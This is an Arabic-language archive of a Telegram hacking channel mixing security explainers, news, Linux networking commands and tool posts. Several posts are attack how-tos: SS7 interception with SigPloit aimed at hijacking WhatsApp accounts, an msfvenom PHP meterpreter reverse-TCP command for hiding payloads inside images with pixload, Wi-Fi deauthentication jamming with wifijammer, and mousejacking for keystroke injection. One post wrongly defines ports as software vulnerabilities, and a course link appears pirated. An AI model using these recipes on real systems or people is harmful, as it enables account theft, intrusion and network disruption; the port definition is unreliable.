Egypt Cyber Security
Open in Telegram
This channel talke about Cyber Security and Programming otc ...? joining to group : t.me/ECY_Community
Show more5 770
Subscribers
No data24 hours
-97 days
-5230 days
Posts Archive
5 770
Linux for Hackers
من افضل الكورسات الي بتأسسك صح
في اهم نظام بنشتغل عليه وهو اللينكس
https://mega.nz/folder/7E4jFYTb#AWm4et8AH8XfFg0GeEnjQA
https://t.me/Mr1GhostMan
5 770
ثغرة SS7
ثغرة ss7 من الثغرات الخطيرة التي تهدد كل هاتف ذكي حول العالم، تعرّف على كيفية استغلال ثغرة الاتصالات وبروتوكول ss7 وكيفيه تفاديه
ما هي ثغرة ss7
اختصارًا لتسمية Signals System No.7 -أي نظام الإشارات السابع- هو بروتوكول اتصالات يستخدم لتبادل البيانات بين الأجهزة، تم إن إنشاءه عام 1975، يستخدم بكثرة في أنظمة الاتصالات اللاسلكية للعديد من شركات الاتصالات حول العالم.
استخداماته:
يستخدم في أنظمة الاتصالات اللاسلكية المحلية والفواتير المدفوعة مسبقًا، وخدمة الرسائل النصية SMS والخدمات الأخرى.
كيفية عمل بروتوكول ss7
فلنفترض أنك تحاول إجراء مكالمة هاتفية بينك وبين صديقك الذي على بعد 40 كم، يقوم بروتوكول ss7 بنقل البيانات المتمثلة بصوتك إلى محطة الاتصالات ثم إلى جهاز صديقة الذي على بعد 40 كم، وأيضًا يحدث العكس مع صديقك.
هذه الآلية تحدث أيضًا لرسائل SMS، هذا البروتوكول هو المسؤول عن نقل مثل هذه البيانات الحساسة.
الثغرات الأمنية في بروتوكول ss7
يمتلك بروتوكول ss7 عيوبًا وثغراتٍ خطيرة جدًا، أضف إلى ذلك أن أكثر من 800 شركة اتصالات عالمية تستخدم بروتوكول ss7، ما يسبب قلق من عملية استغلال ثغراته.
تكمن ثغرة بروتوكول ss7 إلى إمكانية الاعتراض والتجسس على المكالمات والرسائل القصيرة SMS، كذلك تتبع المواقع الجغرافية للمستخدمين.
ايضًا هذا يعني إمكانية تجاوز المصادقة الثنائية التي تستخدم الرسائل القصيرة بكل سهولة، واختراق معظم شبكات التواصل الاجتماعي مثل فيس بوك و تويتر… الخ.
بالإضافة إلى تطبيقات المراسلة مثل WhatsApp و Telegram، وأي تطبيق يطلب رمز تأكيد عن طريق إرسال كود إلى الرقم باستخدام SMS أو الاتصال المباشر.
كيفية الهجوم
حتى تقوم بعمل هجمة بروتوكول ss7، تحتاج إلى أدوات مادية لتحليل الاتصالات، كذلك أدوات برمجية.
أداة SigPloit
أداة SigPloit هي برمجية لاختبار إشارات الشبكة الاتصالات اللاسلكية المحلية وتستخدم أيضًا في عملية استغلال ثغرة بروتوكول ss7.
تنزيل وتثبيت أداة SigPloit
أولًا نقوم بتنزيلها من موقع github من هذا الرابط أو بالأمر التالي لتنزيل الملف مباشرةً
git clone https://web.archive.org/web/20201203032412/https://github.com/SigPloiter/SigPloit
بعد التنزيل نقوم بعملية التثبيت
cd SigPloitsudo pip2
install -r requirements.txt
python sigsloit.py
ثانيًا: اختيار الوحدة النمطية كـ SS7
Myثالثًا: ضبط الخيارات:
client_pc
serve-pc
server IP
port
MSISDN
ثم ادخال رقم الهاتف.
رابعًا: التقاط الحزم من أي محلل مثل الواير شارك.
من خلال تحليل الحزم في ثغرة ss7 يمكنك التنصت على الحزم والتي تتضمن الرسائل النصية والمكالمات الهاتفية.
خامسًا: جمع المعلومات باستخدام أداة “HackRF one”
جهاز HackRF one، يعمل على تحليل الموجات الراديوية بشكل عام مثل FM و GSM و LTE، ويمكنه بذلك تحليل الموجات التي تطلقها أبراج الاتصالات؛ لكن للأسف لا يمكن عمل هجمة من خلال ثغرة ss7 بدون هذا الجهاز، يمكنك شراء واحد من متجر أمازون من هنا، بسعر 319.95 دولارًا.
اختراق WhatsApp
هجوم ثغرة ss7 غالبًا ما يستهدف تطبيق واتساب وذلك لأن لديه أكثر من مليار مستخدم من أكثر من 180 دولة يوميًا؛ قد يظن البعض أن التشفير التام للرسائل في الواتساب يحميه كليّا، لكنه في الأصل يعتمد على التحقق من خلال الرقم (إما رسالة قصيرة أو اتصال) للوصول إلى حساب واتساب الذي مما يمكّن المخترقين من سرقة حساب الواتساب بالكامل، هذا لا يقف عند تطبيق واتساب فقط، فهناك حسابات وتطبيقات أخرى تعتمد على التحقق برقم الهاتف مثل فيس بوك والتيليجرام،، تقريبًا أغلب الخدمات تطلب التحقق من رقم الهاتف!!
كيف أحمي نفسي من ثغرة ss7؟
توصل باحث أمن سيبراني ألماني إلى تطبيق أندرويد يمكنه تجميع وتحليل بيانات الهاتف المحمول لكي تراقب الأمان في الشبكة وتحذرك من الهجمات ss7 في الجوار وهو تطبيق SnoopSnitch.
يتطلب هذا البرنامج صلاحيات الروت (المستخدم الجذر)
يصف المختصون بعدم تفعيل رقم الهاتف إذا كان مرتبطًا بوسائل التواصل الاجتماعي خاصتك، أي بمعنى تخصيص رقم للمكالمات ورقم آخر للواتساب والفيس بوك وغيرها.
شركات تضررت من هذه الثغرة
شركة O2-Telefonica البريطانية.
شركة Telecom الألمانية
ما الحل لثغرة ss7
يصف بعض الباحثون بأنه لا توجد طريقة لتفادي هذه الهجمات، ولكن يمكن الكشف عنها قبل استغلالها بواسطة المحاكاة الافتراضية، بالإضافة إلى أن هذه الثغرة ليست عيبًا في النظام وإنما هي من طبيعته.
مع أننا في عام 2021، إلا أن الكثير من شركات الإتصال المصابة أنظمتها بهذه الثغرة تعد أن مثل هذه الثغرات تمثل تهديد منخفض المستوى، لكن هناك قراصنة مجهولون من يثبت استغلال أخطاء في ثغرة ss7.
https://t.me/Mr1GhostMan
5 770
تعتبر تقنيات الهوني بوت أحد اهم التقنيات على مستوى امن الشبكات فهي كمثل مصيدة يتم اصطياد الهاكرز والمخترقين من خلالها.
ما المقصود ب تقنية Honeynet ؟
هوني بوت يقصد بها بالإنجليزية وعاء العسل وهو عبارة عن فخ لتقصي المحاولات الغير المصرحة بها للولوج إلى نظام الشبكة , فهذه التقنية يتم وضعها في عدة أماكن داخل الشبكة لكي تتم معرفة كيف يقوم المخترق بالتجسس و استغلال الضعف في نظم الحاسب.
ما الهدف من تقنيات Honeypot ؟
الهوني بوت بشكل عام هو جهاز حاسوب وهمي او اجهزه وهمية مصممة لمحاكاة أجهزة حقيقية يتم وضعا داخل الشبكة بشكل واضح لتكون الجزء المستهدف في الشبكة ولكن في الواقع هي معزولة ومراقبة تسجل جميع تحركات الهاكرز ، ويبدو وكأنها تحتوي على معلومات ومصادر ذات قيمة للمخترق، فيما يكون دورها استدراج المخترق وبطبيعة الحال وقوعه في المصيدة.
تقسيمات تقنية Honeypot ؟
هنالك عدة تقسيمات لهذه الأنظمة، فمنهم من صنفها تبعا لطبيعة الاستخدام ومنهم من صنفها حسب طريقة تصميم الشبكة.
حسب أول تصنيف (طبيعة الاستخدام) فإنه يتم تقسيمها لقسمين وهما:
1-Production Honeypot:
وهي تلك التي يتم استخدامها لحماية الشبكات والأنظمة في المنظمات والمؤسسات والشركات لزيادة تأمين هذه المؤسسة وحمايتها. يتميز هذا النوع بسهولة استخدامه لكنه يوفر معلومات قليلة عن أي هجوم.
2-Research Honeypot:
وهي التي يتم استخدامها في الأبحاث من قبل الحكومات والمنظمات والجهات العسكرية لكشف أي برامج خبيثة وتحليل الهجمات التي من الممكن أن تتعرض لها. و يعتبر هذا النوع معقد و لكنه يوفر معلومات كثيرة عن الهجوم.
اما بالنسبة للتصنيف الثاني (وهي الذي يعتمد على طريقة تصميم الشبكة) فإنه يتم تقسيم
هذه الأنظمة الى ثلاثة أنواع وهي:
1-Pure Honeypot:
و هي انظمة كاملة تستخدم الشبكات الفعالة ولا تحتاج لأي أنظمة او برامج أخرى لكي يتم تنصيبها معها.
2-High-interactive Honeypot :
هذا النوع يتم عن طريق تقليد الانظمة بأنظمة مماثلة بنفس العدد من الخدمات و ذلك لإشغال المخترق بفحص جميع الخدمات لإضاعة وقته و هي أكثر أمنا بحيث يصعب كشفها بسهولة و لكن تكلفتها عالية.
3- Low-interaction Honeypot:
وهي عبارة عن محاكاة للخدمات الأكثر طلبا من قبل المخترقين (او من يحاولون الاختراق) وذلك لأنها تستخدم مصادر قليلة من النظام, بحيث يمكن الاستفادة من ذلك بعمل أكثر من جهاز وهمي على نفس الجهاز الحقيقي و الاستفادة منها معا.
وأيضا حسب ما تم ذكره من أصناف سابقة يمكن تصنيفها حسب الخدمة التي تكون الغاية من جذب المخترقين اليها، فممكن أن يكون هنالك
Database Honeypot
Malware Honeypot
Spam Honeypot
وغيرها...
https://t.me/Mr1GhostMan
5 770
ما الفرق بين الاي بي IP والبورت Port والبروتوكول Protocol ⁉️ :
لكى تتواصل الاجهزة مع بعضها فى شبكة واحدة سواء شبكة داخلية LAN او على الانترنت WAN نحتاج لثلاثة امور هامة جدا وهى :
IP address ( 192.168.1.1 ) ( 10.0.0.2 )
Port ( 80 – 25 – 110 – 21 – 53 – 23 )
Protocol ( HTTP – SMTP –pop – ftp – DNS - telnet او HTTPS
---------------
IP address :
هو المعرف الرقمي لأي جهاز (حاسوب، هاتف محمول، آلة طابعة) مرتبط بشبكة معلوماتية تعمل بحزمة بروتوكولات الإنترنت، سواء أكانت شبكة داخلية أو شبكة الإنترنت.
------------
Protocol :
هو عبارة عن برنامح يكون موجود تلقائيا فى اى نظام تشغيل ( ويندوز – ماك - لينكس ) فاى نظام تشغيل فى العالم يكون به بروتوكول HTTP المسئول عن تصفح الانترنت .
------------
Port :
ثغرة برمجية فى انظمة التشغيل وعدد هذه الثغرات ما بين 0 – 65536 تغرة برمجية ، وكل ثغرة يعمل عليها بروتوكول مختلف عن الاخر.
الثغرة البرمجية : فتحة او بوابة فى كل انظمة التشغيل لتنظيم دخول وخروج الداتا.
انواع البروتوكولات والبورتات - نتعرف الان على عدد من اشهر بروتوكولات الانترنت :
SMTP او Simple Mail Transfer Protocol :
هو برتوكول ارسال البريد الالكترونى عبر الانترنت يعمل على Port 25.
POP او Post Office Protocol :
هو بروتوكول استقبال البريد الالكترونى عبر الانترنت ويعمل على Port 110.
FTP او Transfer Protocol File :
هو بروتوكول التحميل من الانترنت ويعمل على Port 21.
DNS او Domain Name System :
هو بروتوكول يقوم بترجمة أسماء النطاقات من كلمات إلى أرقام تعرف باسم عنوان الأي بي ) يعمل على Port 53.
Telnet او Terminal Network :
هو بروتوكول يتيح للمستخدمين إمكانية تشغيل البرامج عن بعد ويعمل على Port 23.
https://t.me/Mr1GhostMan
5 770
بعض أوامر لينكس و تلاحظ أن أغلبها تحتاج إلي صلاحيات الجذر (روت)
تعيين عنوان آي بي
# ifconfig eth0 192.168.2.1/24
إضافة عنوان آي بي إلى واجهة الشبكة
# ifconfig eth0:1
192.168.2.3/24
تغيير عنوان الماك
# macchanger -m MACADDR INTR
تغيير عنوان الماك باستخدام واجهة ifconfig
# ifconfig eth0 hw ether
MACADDR
تغيير حجم MTU باستخدام ifconfig الى 1500
# ifconfig eth0 mtu 1500
إضافة آي بي مخفي لا يظهر مع واجهة ifconfig
# ip addr add 192.168.0.1/24
dev eth0
حظر مجال محدد
# tcpkill -9 host domain.com
عرض ملخص لمنافذ UDP و TCP المفتوحة
# watch ss -stplu
إظهار منافذ الشبكة مع معرفات العملية PIDs
# netstat -tulpn
لتتبع الطلب المفتوح لمنافذ الشبكة
# strace -f -e trace=bind nc -l 80
لتتبع الطلب المفتوح لمنفذ الشبكة UDP / TCP
# strace -f -e trace = network nc -lu 80
عرض العملية التي تستخدم الاتصال بالإنترنت
# lsof -P -i -n
عرض العملية التي تستخدم رقم منفذ محدد
# lsof -i tcp: 443
عرض كافة المنافذ المفتوحة
# lsof -Pnl -i
عرض المنافذ المفتوحة المستمع اليها
# lsof -Pni4 | grep LISTEN | column -t
لجميع المنافذ المفتوحة وملفاتها التنفيذية
# lsof -i -P | grep -i "listen"
لجميع منافذ الاستماع مع PID للعمليات المرتبطة
# lsof -Pan -i tcp -i udp
لجميع الملفات التي تم فتحها بواسطة أمر معين
# lsof -c "process"
لعرض نشاط المستخدم لكل دليل
# lsof -u username -a +D /etc
لعرض دليل العمل الحالي للعملية
# lsof -p < PID > | grep cwd
لإظهار أكبر 10 ملفات مفتوحة
# lsof / | \
awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \
sort -n -u | tail | column -t
لقتل عملية تعمل على منفذ محدد
# kill -9 $ ( lsof -i: < port > | awk ' {l = $ 2} end} print l} ' )
لعرض كافة المنافذ المفتوحة على TCP
# ss -ta
للاستعلام عن خوادم DNS استخدم
# nslookup google.com
او
# dig google.com
وللبحث العكسي لمجال محدد
# nslookup 192.168.0.1
لالتقاط وتحليل حزم TCP / IP المستلمة والمرسلة عبر الشبكة على واجهة محددة
# tcpdump -i eth1
لتحديد عدد معين للحزمات
# tcpdump -c 5 -i eth1
لالتقاط الحزم مع حفظها لتحليلها لاحقا
# tcpdump $ -w capture.pacs -i eth1
أوامر أداة واجهة تكوين الشبكة ifconfig
لتكوين واجهة الشبكة يتم استخدامه لعرض عنوان الآي بي للحالة وعنوان الماك للجهاز المستخدم بالإضافة إلى حجم وحدة الإرسال القصوى MTU للواجهات النشطة حاليا مفيد ايضا في تصحيح الأخطاء و ضبط النظام ويستخدم أيضا لتهيئة واجهات في وقت تمهيد النظام بمجرد تشغيل الخادم ويمكن استخدامه لتعيين عنوان آي بي للواجهة وتمكينها أو تعطيلها
لعرض حالة جميع واجهات الشبكة النشطة
# ifconfig
لجميع الواجهات المتاحة حاليا لأعلى أو لأسفل
# ifconfig -a
لتعيين عنوان آي بي للواجهة
# sudo ifconfig eth0 192.168.56.5 netmask 255.255.255.0
لتنشيط واجهة الشبكة
# sudo ifconfig up eth0
لإلغاء تنشيطها
# sudo ifconfig down eth0
لعرض وتعيين وظائف مماثلة استخدم الأمر
# ip addr show
لتعيين عنوان آي بي مؤقت لواجهة شبكة معينة
# sudo ip addr del 192.168.56.15/24 dev eth0
و لإزالته من الواجهة
# sudo ip addr del 192.168.56.15/24 dev eth0
https://t.me/Mr1GhostMan
5 770
اداة Th3inspector
اداة سريعة وفعالة لجمع المعلومات
تقدر منها تجمع معلومات عن مواقع الانترنت
وللبحث عن عنوان IP وخادم البريد الإلكتروني
وايضا الفحص باستخدام Whois
والمجال الفرعي والخدمات النشطة على المورد
تقدر كمان تفحص منها bin
صندوق بطاقة الائتمان
وتقدر تتأكد من وجود البريد من عدمه
للتحميل
https://github.com/Moham3dRiahi/Th3inspector
# cd Th3inspector
# ./install.sh
وللتشغيل
# Th3inspector
او
perl Th3inspector.pl
5 770
Repost from Zero Security
مش بحب ادخل محتوي دين في قناه محتواها مختلف تماما عن الدين بس للاسف ده محتوي مكتوب مش زي الفديوا اقدر في نص الكلام اقول حاجه عايز اقولها
عمتا بما أن دي زي صفحتي الشخصيه ف حبيت انشر لمره أوله واخيره شي ممكن يهدي شخص ويرجع لربنا
https://youtu.be/GK-RLek02Pk
برودكاست وعي :
https://youtube.com/playlist?list=PLCpK4282MCT-lBXi4Nodjzq1TDZsK9qwr
مقطع رائع للرجوع لله والتوبة :
https://youtu.be/m4UWYvELMIs
5 770
اداة pixload
لوضع البايلود داخل صورة
اداة لكل صيغة
bmp و jpg و gif و png
للتحميل
https://github.com/chinarulezzz/pixload
اذا كنت تريد حقن بايلود metasploit
فجرب باستخدم msfvenom
مثال
msfvenom -p php meterpreter_reverse_tcp /LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
ثم لادخال البايلود حسب الصيغة
jpg.pl -payload ( ...... )
لصيغة bmp استخدم الامر
./bmp.pl [ -payload 'string ] -output payload.bmp
مثل
./bmp.pl -output payload.bmp
ولصيغة jpg
/jpg.pl -output payload.jpg
ولصيغة gif
./gif.pl -output payload.gif
https://t.me/Mr1GhostMan
5 770
اداة wifijammer
لقطع الاتصال والتشويش على متصلين wifi
للتحميل
https://github.com/DanMcInerney/wifijammer
التثبيت
# cd wifijammer
# python setup.py install
للفتح ممكن تستخدم
python wifijammer
او باستخدام قبل اسم الاداة ./
# ./wifijammer -a 00:
لإلغاء مصادقة جميع العملاء المرتبطين
بقناة الوصول 1 او 2 وتحدد بحرف c
ويمكنك أيضا وضع عنوان ماك معين مثل :
# ./wifijammer -a 00: 0E: DA: DE: 24: 8E -c 1
توضيح
-a 00: إلغاء مصادقة المتصلين
للعنوان المحدد E: DA: DE: 24: 8E
-c 1 او -c 2 لقنوات الوصول
-d لتسريع عمليات الإلغاء للعملاء الذين
تم العثور عليهم بدلا من ارسال deauths
-p يأتي بعدها عدد حزمات
ال ap المرسلة الى العميل وعنوان البث
-m لتحديد حد اقصى للمتصلين
-n لتعيين حد اقصى مع عدم جعل
القائمة تمسح نفسها بعد الوصول للحد الاقصى
-s لتخطي الغاء تثبيت ماك معين
حيث يعد تجاهل عنوان MAC معين
مفيدا في حالة رغبتك في إغراء الأشخاص بالانضمام إلى نقطة الوصول الخاصة بك
في حالة رغبتك في استخدام LANs.py
--world لضبط الحد الاقصى للقناة
مثال
# ./wifijammer -c 1 -p 10 -s DL: 3D: 8D: JJ: 39: 52 -d --world
https://t.me/Mr1GhostMan
5 770
شوية أسرار بسيطه لو كتبناها واحنا بندور هنوصل الى احنا محتاجينه بكل ببساطه
1- السر الأول (+)
نستخدم + لما نحتاج ندور على حاجتين مع بعض
- مثال :
Computer+internet
eat + drink
2- السر التانى (-)
نستخدم - لما نحتاج ندور على كلمه معينه مرتبطه بكلمه تانيه بس احنا محتاجين الكلمه الاولى بس
- مثال :
Green - burger
كده هيدور على green بس ومش هيظهر اى حاجه عن burger
3- السر التالت ( " " )
نستخدم " " لما نحتاج ندور فى المواقع على جمله مترتبه
- مثال
" i use facebook "
كده هيدور على كل المواقع الى فيها الجمله ده بترتيب الكلام بالظبط
4- السر الرابع (OR)
نستخدم OR لما ندور على كلمتين فى بس مش مش يكونوا مع بعض
- مثال
Eat or Drink
كده هيدور على المواقع الى فيها eat ومش شرط يكون فيها drink وبرده هيدور على المواقع الى فيها drink ومش شرط يكون فيها eat
5- السر الخامس :site
بنستخدم :site لما نحتاج ندور موضوع داخل موقع معين
- مثال
messi Site:Facebook
كده هيدورلك على كلمه messi فى موقع الفيس بوك
6- السر السادس (*)
نستخدم * لما نكون بندور وناسين كلمه من الى احنا بندور عليه
- مثال
how to * football
كده هيدور على كل كل جمله فيها التلات كلمات دور واكيد هتلاقى الى انت كنت بدور عليه
7- السر السابع +time
بنستخدم الامر ده + time لما نحتاج نعرف الوقت فى دوله معينه
- مثال
Time + England
كده هيجبلك الوقت فى انجلترا
8- السر التامن Info
بنستخدم info لما نحتاج نعرف معلومه عن موقع معين
- مثال :
Info : www.twitter
كده هيطلعلك كل المعلومات عن موقع تويتر
9- السر التاسع :filetype
بنستخدم الأمر ده لما نكون بندور على حاجة وعاوزنها تطلع فى صورة ملفات أو برنامج لتحميل
مثال:
Mechanical engineering filetype:pdf
كده هيطلع كل نتيجة البحث ملفات
10- السر العاشر
لو عايز تبحث عن حاجات علمية في جوجل وعايز نتائج بحث أكاديمية
كل الي عليك انك تضيف العبارة دي site:edu للبحث بتاعك
مثلاً لو كتبت (المريخ site:edu) حتظهر ليك نتائج المواقع الأكاديمية العربية
اما لو كتبت (Mars site:edu) هتظهر ليك النتائج باللغة الإنجليزية
https://t.me/Mr1GhostMan
5 770
مساء الخير
Mouse jacking
طبعا معظمنا عارف القاعدة اللي بتقول its wireless its crackable
طول ما التقنية دي لاسلكية هي قابلة للاختراق
النهاردة هنتكلم عن ال wireless keyboard , mouse
الماوس والكيبورد الوايرليس اللي كلنا بنستخدمهم تقريبا بيعرضوا جهازك للاختراق
ممكن الattacker ينفذ عملية mitm attack ويعمل sniffing لضغطاتك علي المفاتيح وكمان ممكن يعمل keystroks injection ويحقن اوامر في جهازك وياخد عليه remote shell وده كله من علي بعد مسافة تصل ل ١٠٠ متر او اكتر وبدون ما يقرب من جهازك
عشان تجرب تنفذ الattack ده بنفسك هتحتاج جهاز فيه نقطة الضعف دي عشان يكون التارجت بتاعك وهتحتاج اداة اسمها crazy radio وممكن تستخدم logitech unifying reciever كبديل ليها
ودي لينكات. تخص الموضوع ده
https://www.mousejack.com/
https://t.me/Mr1GhostMan🫡
5 770
الحرب التقليدية لم تبدأ لكنها انطلقت في الفضاء السيبراني.. أميركا تكتشف شبكة متسللين روس حصلت على معلومات مهمة
بدأت عمليات استهداف متكررة لمقاولي الدفاع الأميركيين اعتبارا من يناير/كانون الثاني 2020، من قبل المتسللين الروس، وذلك وفقا لوكالة الأمن السيبراني والبنية التحتية الأميركية "سي آي إس إيه" (CISA).
إلى جانب مكتب التحقيقات الفدرالي ووكالة الأمن القومي، تتوقع وكالة الأمن السيبراني والبنية التحتية أن يواصل المتسللون المدعومون من روسيا استهداف مقاولي الدفاع في المستقبل القريب، وفق تعبير الوكالة.
وأضافت الوكالة "من خلال الحصول على مستندات داخلية واتصالات عبر البريد الإلكتروني، قد يكون الخصوم قادرين على تعديل خططهم وأولوياتهم العسكرية، وتسريع جهود التطوير التكنولوجي، وإبلاغ صناع السياسة الأجانب بنوايا الولايات المتحدة واستهداف المصادر المحتملة للتجنيد".
يأتي هذا التحذير في الوقت الذي تستمر فيه التوترات بين الولايات المتحدة وروسيا في التصاعد بشأن غزو محتمل لأوكرانيا. وفي الأسابيع الأخيرة، واجهت البلاد عدة هجمات إلكترونية، كان آخرها في وقت سابق من هذا الأسبوع.
وعانت وزارة الدفاع الأوكرانية واثنان من البنوك المملوكة للدولة من هجمات الحرمان من الخدمة. ولم تُنسب الهجمات مباشرة إلى الجهات الفاعلة المدعومة من روسيا، لكن الدولة ألقت باللوم على جارتها في يناير/كانون الثاني الماضي في حملة أعاقت عشرات المواقع الحكومية.
5 770
أنواع تهديدات الأمن السيبراني
برامج الفدية الضارة
1:برامج الفدية هي نوع من البرامج الضارة. وهي مصممة بهدف ابتزاز المال عن طريق منع الوصول إلى الملفات أو نظام الكمبيوتر حتى يتم دفع الفدية. ولا يضمن دفع الفدية استرداد الملفات أو استعادة النظام.
2:البرامج الضارة
البرامج الضارة هي نوع من البرامج المصممة للوصول غير المصرح به إلى جهاز الكمبيوتر أو إلحاق الضرر به.
3:التحايل باستخدام الهندسة الاجتماعية
الهندسة الاجتماعية هي أسلوب يستخدمه الخصوم لاستدراجك إلى الكشف عن المعلومات الحساسة. يمكنهم طلب الحصول على دفع نقدي أو الوصول إلى بياناتك السرية. ويمكن دمج الهندسة الاجتماعية مع أي من التهديدات المذكورة سابقًا لزيادة فرصتك في النقر على الروابط أو تنزيل البرامج الضارة أو الوثوق بمصدر ضار.
5 770
تصيد المعلومات
تصيد المعلومات هو عملية إرسال رسائل بريد إلكتروني احتيالية تشبه رسائل البريد الإلكتروني من المصادر الموثوقة. والهدف هو سرقة المعلومات الحساسة مثل أرقام بطاقة الائتمان ومعلومات تسجيل الدخول. وهو أكثر أنواع الهجمات الإلكترونية شيوعًا. يمكنك المساعدة في حماية نفسك من خلال التثقيف أو استخدام الحلول التقنية التي تعمل على تصفية رسائل البريد الإلكتروني الضارة.
5 770
ما هو الأمن السيبراني
يحتوي نهج الأمن السيبراني الناجح على طبقات متعددة من الحماية تنتشر عبر أجهزة الكمبيوتر أو الشبكات أو البرامج أو البيانات التي يرغب المرء في الحفاظ عليها. بالنسبة للأشخاص والعمليات والتكنولوجيا، يجب أن يكمل كل منها الآخر داخل المؤسسة لإنشاء دفاع فعال في مواجهة الهجمات السيبرانية يمكن لنظام إدارة التهديدات الموحد أتمتة عمليات التكامل على مستوى منتجات Cisco Security المحددة وتسريع وظائف عمليات الأمان الرئيسية: الاكتشاف والتحقيق والمعالجة.
الأشخاص
يجب على المستخدمين فهم المبادئ الأساسية لأمان البيانات والامتثال إليها مثل اختيار كلمات مرور قوية والحذر من المرفقات الموجودة ضمن البريد الإلكتروني والنسخ الاحتياطي للبيانات. تعرف على المزيد حول المبادئ الأساسية الأمن السيبراني.
العمليات
يجب أن تمتلك المؤسسات إطار عمل حول كيفية التعامل مع الهجمات السيبرانية غير المكتملة والناجحة. يمكن لـ إطار عمل واحد يحظى بقدر من الاحترام أن يرشدك. يوضح كيف يمكنك تحديد الهجمات وحماية الأنظمة واكتشاف التهديدات والتصدي لها والتعافي من الهجمات الناجحة.
التقنية
توفير التكنولوجيا هو أمر ضروري لمنح المؤسسات والأفراد أدوات الأمن السيبراني اللازمة لحماية أنفسهم من الهجمات السيبرانية. يجب حماية ثلاثة كيانات رئيسية: الأجهزة الطرفية مثل أجهزة الكمبيوتر والأجهزة الذكية والموجّهات والشبكات والسحابة. تتضمن أشكال التكنولوجيا الشائعة المستخدمة لحماية هذه الكيانات، الجيل التالي من الجدران النارية وتصفية DNS والحماية ضد البرامج الضارة وبرامج مكافحة الفيروسات وحلول أمان البريد الإلكتروني.
ما سبب أهمية الأمن السيبراني؟
في عالم اليوم المتصل، يستفيد الجميع من برامج الدفاع الإلكتروني المتقدمة. على المستوى الفردي، يمكن أن يُسفر هجوم الأمن الإلكتروني عن الكثير من الأشياء، بدءًا من سرقة الهوية ومرورًا بمحاولات الابتزاز ووصولًا إلى فقدان البيانات المهمة مثل صور العائلة. يعتمد الجميع على بنية أساسية حيوية مثل محطات الطاقة والمستشفيات وشركات الخدمات المالية. وتأمين هذه المؤسسات وغيرها هو أمر ضروري للحفاظ على سير عمل المجتمع لدينا.
كما يستفيد الجميع من عمل الباحثين في مجال التهديدات السيبرانية، مثل فريق Talos المكون من 250 باحثًا، والذين يحققون في التهديدات الجديدة والناشئة وإستراتيجيات الهجوم السيبراني. وهم يعملون على كشف الثغرات الأمنية الجديدة وتثقيف الجمهور حول أهمية الأمن السيبراني ودعم الأدوات مفتوحة المصدر. تجعل جهودهم من الإنترنت مكانًا أكثر أمنًا للجميع.
5 770
افضل محركات البحث لمختبرين الإختراق ومحترفين السيكيورتي
https://censys.io
https://shodan.io
https://viz.greynoise.io
https://zoomeye.org
https://netograph.io
https://wigle.net
https://intelx.io
https://fofa.so
https://hunter.io
https://haveibeenpwned.com
https://crt.sh/
https://dnsdumpster.com/
t.me/hk_tricks
شكر عام لمن يدعم و يتفاعل❤️
5 770
السلام عليكم ورحمة الله وبركاتة
الادمن الجديد المختص في الامن السيبراني
اول بنكون ننشر الاخبار عن الامن السيبراني ادوات تحديثات جديدة كل مايتعلق بالامن السيبراني
بنسبه للكورسات في الامن السيبراني في الكثير منها بس نشتي يكون في اكبر عدد ممكن من الاعضاء اول ماتصل القناة ٣٥٠٠
بانزل لكم كورس جميل جدا
عندكم اقتراحات وفكر شاركونا
https://t.me/Mr1GhostMan
5 770
Repost from Manjmy منجمى
استخدامات اشهر لغات البرمجة ❤❤:
1) لغة ++C
-برمجة تطبيقات سطح المكتب
-برمجة الالعاب
-بناء نظم التشغيل.
-وتطوير ألعاب الفيديو المختلفة
--------------------
2) لغة #C
-برمجة تطبيقات الهواتف الذكية
(اندرويد - ابل)
-صناعة و تطوير برمجيات متجر الويندوز
-صناعة تطبيقات سطح المكتب (Desktop)
--------------
3) لغة ASP
-برمجة المواقع الالكترونية
-تصميم المواقع الالكترونية
4) لغة Php
-برمجة المواقع الالكترونية
-برمجة بوتات التليجرام
-تستخدم من قبل خادم الويب لبرمجة المواقع و البرامج و هي يمكن إستخدامها مع انوع مختلفة من أنظمة ادارة البيانات و تتوافق مع أنظمة تشغيل مختلفة .
---------------------
5) لغة الجافا Java
-برمجة تطبيقات سطح المكتب
-برمجة المواقع الالكترونية
-برمجة الالعاب
- برمجة تطبيقات الهواتف الذكية
--------------------
6) لغة البايثون Python
-تحليل البيانات
-تعلم الاله
-التعلم العميق
-الذكاء الاصطناعي
-برمجة المواقع الالكترونية
-التشفير و الحماية
-الشبكات والسيرفرات
--------------
7) لغة R
-تحليل البيانات
--------------------
8 لغة الكوتلين kotlin
-برمجة تطبيقات الهواتف الذكية (اندرويد)
-------------------
9) لغة Swift
-برمجة تطبيقات الهواتف الذكية (ابل)
----------------
10 )لغة جافا سكربت(JavaScript )
-برمجة المواقع الالكترونية
-تصميم المواقع الالكترونية
-تصميم تطبيقات الهواتف الذكية
-تصميم تطبيقات سطح المكتب
-برمجة الالعاب
========================
ودي اقوى القنوات العربيه لتعلم لغات البرمجه 2022
1 - افضل القنوات لتعلم لغات تطوير مواقع الويب
2- افضل القنوات العربيه لتعلم البرمجه - الخوارزميات
3 - افضل القنوات لتعلم لغة C++:
4 - افضل القنوات لتعلم لغة C#
5 - افضل القنوات لتعلم لغة Java
6- افضل القنوات لتعلم لغة Python
7 - افضل القنوات لتعلم لغة Kotlin
8 - افضل القنوات لتعلم لغة Flutter & Dart
9 -افضل القنوات لتعلم الذكاء الاصطناعي
10- افضل القنوات لتعلم قواعد البيانات
لينكات جميع القنوات من هنا :- https://bit.ly/33fJZQE
____
5 770
مساء الخير عليكم
